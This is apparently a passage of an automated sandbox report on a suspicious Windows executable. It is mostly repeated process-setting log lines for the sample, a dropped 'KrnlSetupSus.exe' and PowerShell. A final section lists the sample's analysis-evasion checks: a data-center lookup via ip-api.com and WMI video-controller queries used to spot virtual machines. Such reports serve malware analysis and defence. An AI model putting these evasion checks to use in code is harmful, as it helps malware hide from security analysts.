                              Source: C:\Users\user\Desktop\RdLfpZY5A9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\RdLfpZY5A9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\RdLfpZY5A9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\RdLfpZY5A9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\RdLfpZY5A9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\RdLfpZY5A9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\RdLfpZY5A9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\RdLfpZY5A9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\RdLfpZY5A9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\RdLfpZY5A9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\RdLfpZY5A9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\RdLfpZY5A9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                              Malware Analysis System Evasion

                              barindex
                              Check if machine is in data center or colocation facility
                              Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                              Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                              Source: C:\ProgramData\KrnlSetupSus.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                              Source: C:\ProgramData\KrnlSetupSus.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                              Source: C:\ProgramData\KrnlSetupSus.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
